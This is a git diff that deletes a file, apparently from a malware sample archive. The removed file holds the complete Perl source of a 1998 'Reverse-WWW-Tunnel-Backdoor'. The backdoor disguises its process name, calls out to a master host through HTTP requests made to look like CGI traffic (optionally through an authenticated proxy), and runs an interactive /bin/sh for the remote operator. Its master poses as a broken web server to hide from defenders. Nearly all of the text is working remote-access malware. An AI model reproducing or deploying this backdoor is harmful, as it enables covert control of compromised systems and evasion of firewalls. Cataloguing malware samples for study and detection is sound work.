diff --git a/Perl/Backdoor.Perl.AEI.a b/Perl/Backdoor.Perl.AEI.a deleted file mode 100644 index 71c5262f..00000000 --- a/Perl/Backdoor.Perl.AEI.a +++ /dev/null @@ -1,334 +0,0 @@ -# -# Reverse-WWW-Tunnel-Backdoor v1.6 -# (c) 1998 by van Hauser / [THC] - The Hacker's Choice -# Check out http://r3wt.base.org for updates -# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls" -# available at the website above in the "Articles" section. -# - -# Greets to all THC, ADM, arF and #bluebox guys - -# verified to work on Linux, Solaris, AIX and OpenBSD - -# BUGS: some Solaris machines: select(3) is broken, won't work there -# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ... -# we can't make proper receive checks here. Workaround implemented. -# -# HISTORY: -# v1.6: included www-proxy authentication ;-)) -# v1.4: porting to various unix types (and I thought perl'd be portable...) -# v1.3: initial public release of the paper including this tool - -# -# GENERAL CONFIG (except for $MASK, everything must be the same -# for MASTER and SLAVE is this section!) -# -$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char! -$MASK="vi"; # for masking the program's process name -$PASSWORD="THC"; # anything, nothing you have to rememeber - # (not a real "password" anyway) -# -# MASTER CONFIG (specific for the MASTER) -# -$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) -$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!) - -# -# SLAVE CONFIG (specific for the SLAVE) -# -$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) -$DELAY="3"; # time to wait for output after your command(s) -#$TIME="00:01"; # time when to connect to the master (unset if now) -#$DAILY="yes"; # tries to connect once daily if set with something -#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one -#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one -#$PROXY_USER="user"; # username for proxy authentication -#$PROXY_PASSWORD="pass"; # password for proxy authentication -#$DEBUG=""; # for debugging purpose, turn off when in production -$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris - -# END OF CONFIG # nothing for you to do after this point # - -################## BEGIN MAIN CODE ################## - -require 5.002; -use Socket; - -$|=1; # next line changes our process name -if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } -undef $DAILY if (! $TIME); -if ( !($PROXY) || !($PROXY_PORT) ) { - undef $PROXY; - undef $PROXY_PORT; -} -$protocol = getprotobyname('tcp'); - -if ($ARGV[0] ne "") { - if ($ARGV[0] eq "-h") { - print STDOUT "no commandline option : daemon mode\n"; - print STDOUT "using \"-h\" as option : this help\n"; - print STDOUT "any other option : slave mode\n"; - exit(0); - } else { - print STDOUT "starting in slave mode\n"; - $SLAVE_MODE = "yeah"; - } -} - -if (! $SLAVE_MODE) { - &master; -} else { - &slave; -} -# END OF MAIN FUNCTION - -############### SLAVE FUNCTION ############### - -sub slave { - $pid = 0; - if ($PROXY) { # setting the real config (for Proxy Support) - $REAL_SERVER = $PROXY; - $REAL_PORT = $PROXY_PORT; - $REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT - . $CGI_PREFIX; - $PROXY_SUFFIX = "Pragma: no-cache\n"; - if ( $PROXY_USER && USER_PASSWORD ) { - &base64encoding; - $PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE; - } - } else { - $REAL_SERVER = $SERVER; - $REAL_PORT = $LISTEN_PORT; - $REAL_PREFIX = "GET " . $CGI_PREFIX; - } -AGAIN: if ($pid) { kill 9, $pid; } - if ($TIME) { # wait until the specified $TIME - $TIME =~ s/^0//; $TIME =~ s/:0/:/; - (undef,$min,$hour,undef,undef,undef,undef,undef,undef) - = localtime(time); - $t=$hour . ":" . $min; - while ($TIME ne $t) { - sleep(28); # every 28 seconds we look at the watch - (undef,$min,$hour,undef,undef,undef,undef,undef,undef) - = localtime(time); - $t=$hour . ":" .$min; - } - } - print STDERR "Slave activated\n" if $DEBUG; - if ($DAILY) { # if we must connect daily, we'll - if (fork) { # fork the daily shell process to - sleep(69); # ensure the master control process - goto AGAIN; # won't get stuck by a fucking cmd - } # the user executed. - print STDERR "forked\n" if $DEBUG; - } - $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; - $remote = sockaddr_in($REAL_PORT, $address); - $forked = 0; -GO: close(THC); - socket(THC, &PF_INET, &SOCK_STREAM, $protocol) - or die "can't create socket\n"; - setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); - if (! $forked) { # fork failed? fuck, let's try again - pipe R_IN, W_IN; select W_IN; $|=1; - pipe R_OUT, W_OUT; select W_OUT; $|=1; - $pid = fork; - if (! defined $pid) { - close THC; - close R_IN; close W_IN; - close R_OUT; close W_OUT; - goto GO; - } - $forked = 1; - } - if (! $pid) { # this is the child process (execs $SHELL) - close R_OUT; close W_IN; close THC; - print STDERR "forking $SHELL in child\n" if $DEBUG; - open STDIN, "<&R_IN"; - open STDOUT, ">&W_OUT"; - open STDERR, ">&W_OUT"; - exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; - close R_IN; close W_OUT; - exit(0); - } else { # this is the parent (data control + network) - close R_IN; - sleep($DELAY); # we wait $DELAY for the commands to complete - vec($rs, fileno(R_OUT), 1) = 1; - print STDERR "before: allwritten2stdin\n" if $DEBUG; - select($r = $rs, undef, undef, 30); - print STDERR "after : wait for allwritten2stdin\n" if $DEBUG; - sleep(1); # The following readin of the command output - $output = ""; # looks weird. It must be! every system - vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-(( - print STDERR "before: readwhiledatafromstdout\n" if $DEBUG; - while (select($w = $ws, undef, undef, 1)) { - read R_OUT, $readout, 1 || last; - $output = $output . $readout; - } - print STDERR "after : readwhiledatafromstdout\n" if $DEBUG; - print STDERR "before: fucksunprob\n" if $DEBUG; - vec($ws, fileno(W_OUT), 1) = 1; - while (! select(undef, $w=$ws, undef, 0.001)) { - read R_OUT, $readout, 1 || last; - $output = $output . $readout; - } - print STDERR "after : fucksunprob\n" if $DEBUG; - print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG; - print W_OUT "\000" || goto ENDE; - print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG; - while (1) { - read R_OUT, $readout, 1 || last; - last if ($readout eq "\000"); - $output = $output . $readout; - } - print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG; - &uuencode; # does the encoding of the shell output - $encoded = $REAL_PREFIX . $encoded; - $encoded = $encoded . $PROXY_SUFFIX if ($PROXY); - $encoded = $encoded . "\n"; - print STDERR "connecting to remote, fail->exit\n" if $DEBUG; - connect(THC, $remote) || goto ENDE; # connect to master - print STDERR "send encoded data, fail->exit\n" if $DEBUG; - send (THC, $encoded, 0) || goto ENDE; # and send data - $input = ""; - vec($rt, fileno(THC), 1) = 1; # wait until master sends reply - print STDERR "before: wait4answerfromremote\n" if $DEBUG; - while (! select($r = $rt, undef, undef, 0.00001)) {} - print STDERR "after : wait4answerfromremote\n" if $DEBUG; - print STDERR "read data from socket until eod\n" if $DEBUG; - $error="no"; - while (1) { # read until EOD (End Of Data) - print STDERR "?" if $DEBUG; - # OpenBSD 2.2 can't recv here! can't get any data! sucks ... - recv (THC, $readin, 1, 0) || undef $error; - if ((! $error) and (! $BROKEN_RECV)) { goto OK; } - print STDERR "!" if $DEBUG; - goto OK if (($readin eq "\000") or ($readin eq "\n") - or ($readin eq "")); - $input = $input . $readin; - } -OK: print STDERR "\nall data read, entering OK\n" if $DEBUG; - $input =~ s/\n//gs; - &uudecode; # decoding the data from the master - print STDERR "if password not found -> exit\n" if $DEBUG; - goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0); - $decoded =~ s/^$PASSWORD//; - print STDERR "writing input data to $SHELL\n" if $DEBUG; - print W_IN "$decoded" || goto ENDE; # sending the data - sleep(1); # to the shell proc. - print STDERR "jumping to GO\n" if $DEBUG; - goto GO; - } -ENDE: kill 9, $pid; $pid = 0; - exit(0); -} # END OF SLAVE FUNCTION - -############### MASTER FUNCTION ############### - -sub master { - socket(THC, &PF_INET, &SOCK_STREAM, $protocol) - or die "can't create socket\n"; - setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); - bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; - listen(THC, 3) || die "can't listen\n"; # print the HELP - print STDOUT ' -Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ... - -Introduction: Wait for your SLAVE to connect, examine it\'s output and then - type in your commands to execute on SLAVE. You\'ll have to - wait min. the set $DELAY seconds before you get the output - and can execute the next stuff. Use ";" for multiple commands. - Trying to execute interactive commands may give you headache - so beware. Your SLAVE may hang until the daily connect try - (if set - otherwise you lost). - You also shouldn\'t try to view binary data too ;-) - "echo bla >> file", "cat >> file <<- EOF", sed etc. are your - friends if you don\'t like using vi in a delayed line mode ;-) - To exit this program on any time without doing harm to either - MASTER or SLAVE just press Control-C. - Now have fun. -'; - -YOP: print STDOUT "\nWaiting for connect ..."; - $remote=accept (S, THC) || goto YOP; # get the connection - ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE - $slave=gethostbyaddr($r_slave, AF_INET); # data. - $slave="unresolved" if ($slave eq ""); - print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; - select S; $|=1; - select STDOUT; $|=1; - $input = ""; - vec($socks, fileno(S), 1) = 1; - $error="no"; - while (1) { # read the data sent by the slave - while (! select($r = $socks, undef, undef, 0.00001)) {} - recv (S, $readin, 80, 0) || undef $error; - if ((! $error) and (! $BROKEN_RECV)) { - print STDOUT "[disconnected]\n"; - } - $readin =~ s/\r//g; - $input = $input . $readin; - last if ( $input =~ m/\n\n/s ); - } - &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); - $input =~ s/^.*($CGI_PREFIX)\??//s; - $input =~ s/\n.*$//s; - &uudecode; # decoding the data from the slave - &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); - $decoded =~ s/^$PASSWORD//s; - $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); - print STDOUT "$decoded"; # showing the slave output to the user - $output = ; # and get his input. - &uuencode; # encode the data for the slave - send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it - close (S); - print STDOUT "sent.\n"; - goto YOP; # wait for the next connect from the slave -} # END OF MASTER FUNCTION - -###################### MISC. FUNCTIONS ##################### - -sub uuencode { # does the encoding stuff for error-free data transfer via WWW - $output = $PASSWORD . $output; # PW is for error checking and - $uuencoded = pack "u", "$output"; # preventing sysadmins from - $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird - /'zcadefghjklmnopqrstuv' # data. No real - /; # security! - $uuencoded =~ tr/"'"/'b'/; - if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb - $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; - $cut_length = 4099 - (length $REAL_PREFIX); - $uuencoded = pack "a$cut_length", $uuencoded - if ($codelength > 4111); - } - $encoded = $uuencoded; - $encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE); -} # END OF UUENCODE FUNCTION - -sub uudecode { # does the decoding of the data stream - $input =~ tr/'zcadefghjklmnopqrstuv' - /'\n)=(:;&><,#$*%]!\@"`\\\-' - /; - $input =~ tr/'b'/"'"/; - $decoded = unpack "u", "$input"; -} # END OF UUDECODE FUNCTION - -sub base64encoding { # does the base64 encoding for proxy passwords - $encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD; - $encoded_string = substr(pack('u', $encode_string), 1); - chomp($encoded_string); - $encoded_string =~ tr|` -_|AA-Za-z0-9+/|; - $padding = (3 - length($encode_string) % 3) % 3; - $encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding; - $PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n"; -} # END OF BASE64ENCODING FUNCTION - -sub hide_as_broken_webserver { # invalid request -> look like broken server - send (S, "\n404 File Not Found\n". - "\n

File Not Found

\n\n", 0); - close S; - print STDOUT "Warning! Illegal server access!\n"; # report to user - goto YOP; -} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION - -# END OF PROGRAM # (c) 1998 by